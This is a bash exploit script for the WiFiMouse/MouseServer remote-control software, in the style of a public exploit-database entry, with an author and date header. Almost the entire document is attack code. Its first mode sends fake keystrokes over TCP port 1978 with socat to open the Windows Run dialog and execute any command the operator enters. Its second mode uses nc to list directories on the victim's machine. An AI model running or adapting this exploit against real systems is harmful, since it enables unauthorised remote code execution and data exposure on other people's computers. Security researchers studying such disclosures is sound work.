# Exploit Title: WiFiMouse - Remote Code Execution (RCE) # Date: 15-08-2022 # Author: Febin # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: # Tested on: Windows 10 #!/bin/bash printf " WiFiMouse / MouseServer Exploit by FEBIN " printf "[*] Enter the Target IP Address: " read TARGET rce(){ printf "[*] Enter the Command to execute on the Target: " read CMD sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978 } dirlist(){ echo "[*] User's Home Directory Contents:" echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2- while $true do printf "\nList Directory:> " read DIR echo "[+] Contents of $DIR: " echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2- done } printf " [1] Remote Command Execution [2] Directory Listing " printf "Enter Your Choice (1 or 2) : " read CHOICE if [[ $CHOICE == "1" ]] then rce elif [[ $CHOICE == "2" ]] then dirlist else echo "[-] Invalid Choice!" fi